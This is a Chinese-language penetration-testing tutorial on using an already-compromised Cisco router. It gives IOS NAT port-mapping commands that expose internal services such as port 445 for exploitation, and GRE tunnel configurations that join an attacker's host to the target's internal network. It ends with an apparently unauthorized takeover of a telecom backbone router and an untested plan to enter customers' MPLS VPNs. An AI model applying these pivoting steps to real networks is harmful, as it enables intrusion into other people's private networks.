當前位置:
首頁 > 新聞 > 滲透測試之cisco路由器在滲透中的利用

滲透測試之cisco路由器在滲透中的利用

相信很多朋友在做滲透測試的過程中,經常會遇到一些路由器等網路設備,那麼,在我們獲得路由器的最高操作許可權,具有修改路由器配置的情況下,可以進行哪些操作呢,本文將結合作者之前的測試案例,介紹兩種cisco路由器在滲透過程中的利用方法,以及一次在獲得某電信網路骨幹路由器許可權後的思考。

一、埠映射,各個擊破

路由器埠映射就是在路由器開放一個埠,並將該埠映射到相應的主機埠。當外網有數據訪問路由器開放的埠時,路由器直接將來該埠的所有數據轉發到相應的主機埠。

通過互聯網獲得的路由器設備,最常見的網路拓撲如下圖:

路由器內網連接著多個伺服器,但是無法從外網訪問,這時如果我們知道它們所開放的服務,就可以通過路由器埠映射的方法,將內網的服務埠映射到路由器的外網地址,從而實現對內網服務的訪問,配置代碼如下:

route>en

Password:

route#conf t

route(config)#ip nat inside source static tcp 192.168.1.13 80 23.23.23.23 8081

route(config)#exit

route#wr

上述配置是將內網192.168.1.13伺服器的80埠,映射到外網23.23.23.23的8081埠上,如果要刪除這條配置,代碼如下:

route(config)#no ip nat inside source static tcp 192.168.1.13 80 23.23.23.23 8081

tips:

1、由於對路由器配置進行修改,操作完畢後要及時刪除添加的配置;

2、映射到外網埠時,要考慮防火牆的問題,選擇允許訪問的埠;

3、利用這種方法可以將內網主機的445等常見漏洞埠映射出來,進行溢出測試,由於是內網,伺服器系統相對老舊,補丁也不全,說不定會有意外驚喜。

二、隧道搭建,直搞黃龍

GRE(Generic routing encapsulation)通用路由封裝是一種隧道協議,能夠在IP隧道中封裝各種網路層協議的分組,從而創建虛擬點到點鏈路。利用GRE協議搭建隧道,實現將本地主機加入到目標路由器所在的內網的功能,可以忽略網路的連接,隨意進行內網測試,只不過此時本地也需要一台支持GRE協議的路由器。

(對GRE協議以及GRE數據包格式不了解的同學可以自行學習)

此時的網路結構大致如下:

目標路由器連接著一個內網,地址段為192.168.1.0/24,而此時,通過對目標路由器B和本地路由器A進行GRE的配置,就可實現本地主機(192.168.1.211)加入目標網路,成為網路中的一個節點,就像訪問本地區域網一樣。

目標路由器_B的配置:

interface Ethernet0/1 #內網介面

ip address 192.168.1.1 255.255.255.0

interface Serial0/0 #外網介面

ip address 13.13.13.13 255.255.255.0 #外網地址

interface Tunnel0 #隧道名稱

ip address 1.1.1.1 255.255.255.0 #隧道地址,此地址可以隨意填寫

tunnel source Serial0/0 #隧道源地址,即外網介面地址

tunnel destination 12.12.12.12 #隧道目的地址,即對端路由器外網介面地址

ip route 192.168.1.211 255.255.255.255 Tunnel0 #路由信息,通過Tunnel0介面訪問本地主機

本地路由器_A的配置:

interface Ethernet0/1 #內網介面

ip address 192.168.1.1 255.255.255.0

interface Serial0/0 #外網介面

ip address 12.12.12.12 255.255.255.0 #外網地址

interface Tunnel1 #隧道名稱

ip address 2.2.2.2 255.255.255.0 #隧道地址,此地址可以隨意填寫

tunnel source Serial0/0 #隧道源地址,即外網介面地址

tunnel destination 13.13.13.13 #隧道目的地址,即對端路由器外網介面地址

ip route 0.0.0.0 0.0.0.0 Tunnel1 #路由信息,本地主機的所有數據都從Tunnel0介面發出

兩個路由器經過上述配置後,本地主機與目標路由器內網就處在一個網路中,方便下一步的滲透測試。

tips:

1、通過目標路由器配置GRE隧道,必須要求本地具有一台支持GRE協議的路由器;

2、GRE隧道是點對點連接,所以本地路由器必須有一個獨立的外網地址;

3、上述GRE隧道不加密,為明文傳輸,具有一定風險;

4、要確保本地主機的IP地址與目標路由器內網的主機IP不衝突。

三、對某電信網路骨幹路由器利用的思考

曾經,一個偶然的機會,獲得了某電信網路骨幹路由器的控制權,也就是傳說中的MPLS VPN網路中的PE路由器(邊界路由器) , 通過show run配置,發現其上配置了大量的VPN網路,每個VPN網路就是一個Tunnel介面,相同用戶VPN網路使用同一個VRF號,通過每個Tunnel介面以及VRF號的描述信息,很容易知道每個Tunnel和VRF對應的用戶信息。

由於使用的是GRE協議配置的VPN網路,所以就設想,利用上述搭隧道的方法,本地路由器充當一台CE,應該可以實現將本地的主機加入任意VPN網路,只需要在本地路由器配置Tunnel介面時,使用相同的VRF號。

上述想法雖然未經測試,但本人覺得這個思路應該能夠實現。

註:本文代碼與思路完全公開,請僅作學習交流使用,不要對號入座,其餘用途與本文作者無關。


喜歡這篇文章嗎?立刻分享出去讓更多人知道吧!

本站內容充實豐富,博大精深,小編精選每日熱門資訊,隨時更新,點擊「搶先收到最新資訊」瀏覽吧!


請您繼續閱讀更多來自 嘶吼RoarTalk 的精彩文章:

新型銀行惡意軟體變種KillDisk來襲,專攻拉美金融機構
暴雪遊戲存在嚴重遠程控制漏洞,數億用戶受影響

TAG:嘶吼RoarTalk |